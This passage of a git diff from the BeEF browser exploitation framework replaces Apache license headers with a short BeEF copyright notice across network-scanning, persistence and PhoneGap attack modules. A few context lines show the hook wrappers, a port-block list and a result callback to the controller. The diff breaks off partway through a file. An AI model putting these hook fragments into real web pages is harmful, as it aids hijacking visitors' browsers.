-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.execute(function() {
 
     var ipRange = "<%= @ipRange %>";
diff --git a/modules/network/ping_sweep_java/config.yaml b/modules/network/ping_sweep_java/config.yaml
index 5b11939b2..67c0ad693 100644
--- a/modules/network/ping_sweep_java/config.yaml
+++ b/modules/network/ping_sweep_java/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/ping_sweep_java/module.rb b/modules/network/ping_sweep_java/module.rb
index 4342f61f6..cf836dd98 100644
--- a/modules/network/ping_sweep_java/module.rb
+++ b/modules/network/ping_sweep_java/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Ping Sweep Module - jgaliana
diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js
index 415c914e6..dd633f7eb 100644
--- a/modules/network/port_scanner/command.js
+++ b/modules/network/port_scanner/command.js
@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.execute(function() {
 
 	var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];
diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml
index a1ac2d103..ea54c96c1 100644
--- a/modules/network/port_scanner/config.yaml
+++ b/modules/network/port_scanner/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index 4b0957bdd..a76072c84 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #
 # Port Scanner Module - javier.marcos
diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js
index 1609bcab7..9bdbb31f3 100644
--- a/modules/persistence/confirm_close_tab/command.js
+++ b/modules/persistence/confirm_close_tab/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     function display_confirm(){
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
index 62bcd36e6..40553840b 100644
--- a/modules/persistence/confirm_close_tab/config.yaml
+++ b/modules/persistence/confirm_close_tab/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb
index e38abbfd5..a523c63aa 100644
--- a/modules/persistence/confirm_close_tab/module.rb
+++ b/modules/persistence/confirm_close_tab/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Confirm_close_tab < BeEF::Core::Command
 
diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js
index 3cf076368..7f1f5cea7 100644
--- a/modules/persistence/iframe_above/command.js
+++ b/modules/persistence/iframe_above/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	beef.session.persistent();
 	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
diff --git a/modules/persistence/iframe_above/config.yaml b/modules/persistence/iframe_above/config.yaml
index 7bff8e43b..cb2a75350 100644
--- a/modules/persistence/iframe_above/config.yaml
+++ b/modules/persistence/iframe_above/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/persistence/iframe_above/module.rb b/modules/persistence/iframe_above/module.rb
index 053986199..59bb60847 100644
--- a/modules/persistence/iframe_above/module.rb
+++ b/modules/persistence/iframe_above/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Iframe_above < BeEF::Core::Command
   
diff --git a/modules/persistence/man_in_the_browser/config.yaml b/modules/persistence/man_in_the_browser/config.yaml
index 1f022ef1d..732b3e31f 100644
--- a/modules/persistence/man_in_the_browser/config.yaml
+++ b/modules/persistence/man_in_the_browser/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/persistence/man_in_the_browser/module.rb b/modules/persistence/man_in_the_browser/module.rb
index 75e8255c0..6035522ba 100644
--- a/modules/persistence/man_in_the_browser/module.rb
+++ b/modules/persistence/man_in_the_browser/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Man_in_the_browser < BeEF::Core::Command
diff --git a/modules/persistence/popunder_window/command.js b/modules/persistence/popunder_window/command.js
index 92cc6b07b..dc89768e9 100644
--- a/modules/persistence/popunder_window/command.js
+++ b/modules/persistence/popunder_window/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	
 	var result = "Pop-under window successfully created!";
diff --git a/modules/persistence/popunder_window/config.yaml b/modules/persistence/popunder_window/config.yaml
index 8af49d40c..baed13237 100644
--- a/modules/persistence/popunder_window/config.yaml
+++ b/modules/persistence/popunder_window/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/persistence/popunder_window/module.rb b/modules/persistence/popunder_window/module.rb
index 850d1b6b6..c9612e35f 100644
--- a/modules/persistence/popunder_window/module.rb
+++ b/modules/persistence/popunder_window/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Popunder_window < BeEF::Core::Command
   
diff --git a/modules/phonegap/phonegap_beep/command.js b/modules/phonegap/phonegap_beep/command.js
index 1bf39ecce..91802774f 100644
--- a/modules/phonegap/phonegap_beep/command.js
+++ b/modules/phonegap/phonegap_beep/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // make the phone beep
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_beep/config.yaml b/modules/phonegap/phonegap_beep/config.yaml
index c474553aa..ef5ce3c3c 100644
--- a/modules/phonegap/phonegap_beep/config.yaml
+++ b/modules/phonegap/phonegap_beep/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_beep/module.rb b/modules/phonegap/phonegap_beep/module.rb
index 013ae3b3c..9f7743d7e 100644
--- a/modules/phonegap/phonegap_beep/module.rb
+++ b/modules/phonegap/phonegap_beep/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_check_connection/config.yaml b/modules/phonegap/phonegap_check_connection/config.yaml
index 37ebf924b..a4734289e 100644
--- a/modules/phonegap/phonegap_check_connection/config.yaml
+++ b/modules/phonegap/phonegap_check_connection/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_check_connection/module.rb b/modules/phonegap/phonegap_check_connection/module.rb
index 708c0d384..12f2ab5d0 100644
--- a/modules/phonegap/phonegap_check_connection/module.rb
+++ b/modules/phonegap/phonegap_check_connection/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_detect/command.js b/modules/phonegap/phonegap_detect/command.js
index bc062c00c..63afc69fd 100644
--- a/modules/phonegap/phonegap_detect/command.js
+++ b/modules/phonegap/phonegap_detect/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // detect phonegap
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_detect/config.yaml b/modules/phonegap/phonegap_detect/config.yaml
index e1e55e846..c68722597 100644
--- a/modules/phonegap/phonegap_detect/config.yaml
+++ b/modules/phonegap/phonegap_detect/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_detect/module.rb b/modules/phonegap/phonegap_detect/module.rb
index 8242c79e8..dfb9c178e 100644
--- a/modules/phonegap/phonegap_detect/module.rb
+++ b/modules/phonegap/phonegap_detect/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_file_upload/command.js b/modules/phonegap/phonegap_file_upload/command.js
index c6b15e78e..fcf418b7b 100644
--- a/modules/phonegap/phonegap_file_upload/command.js
+++ b/modules/phonegap/phonegap_file_upload/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // phonegap_upload
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_file_upload/config.yaml b/modules/phonegap/phonegap_file_upload/config.yaml
index f82d42fe8..f873bedd4 100644
--- a/modules/phonegap/phonegap_file_upload/config.yaml
+++ b/modules/phonegap/phonegap_file_upload/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_file_upload/module.rb b/modules/phonegap/phonegap_file_upload/module.rb
index 41b5f712f..3f058b4b5 100644
--- a/modules/phonegap/phonegap_file_upload/module.rb
+++ b/modules/phonegap/phonegap_file_upload/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # phonegap
 #
diff --git a/modules/phonegap/phonegap_geo_locate/command.js b/modules/phonegap/phonegap_geo_locate/command.js
index 15ea8fbf7..25d0d0095 100644
--- a/modules/phonegap/phonegap_geo_locate/command.js
+++ b/modules/phonegap/phonegap_geo_locate/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // geo locate
 //
 beef.execute(function() {
diff --git a/modules/phonegap/phonegap_geo_locate/config.yaml b/modules/phonegap/phonegap_geo_locate/config.yaml
index cb2a83894..af9f421a8 100644
--- a/modules/phonegap/phonegap_geo_locate/config.yaml
+++ b/modules/phonegap/phonegap_geo_locate/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 #   phonegap
 #
diff --git a/modules/phonegap/phonegap_geo_locate/module.rb b/modules/phonegap/phonegap_geo_locate/module.rb
index 848d32e62..e66d6818e 100644
--- a/modules/phonegap/phonegap_geo_locate/module.rb
+++ b/modules/phonegap/phonegap_geo_locate/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
